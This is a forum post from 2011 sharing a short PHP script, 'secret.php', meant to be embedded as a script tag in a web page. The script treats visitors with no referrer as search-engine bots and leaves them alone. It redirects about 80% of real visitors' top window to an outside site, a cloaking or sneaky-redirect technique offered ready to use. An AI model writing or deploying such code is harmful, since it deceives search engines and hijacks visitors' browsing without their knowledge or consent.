View Single Post
Old 03-05-2011, 09:17 PM  
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
save as secret.php
Code:
<?php
$guy = $_SERVER["HTTP_REFERER"];
$num = rand(1, 100);
if ($guy == ""){
?>
var visitor = "google bot";
<?php
} else {
?>
var visitor = "not a bot";
<?php
if($num < 80){
?>
top.location.href="http://redirect.com";
<?php
}
}
?>
call in head of page like <script src=http://yoursite.com/secret.php></script>
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote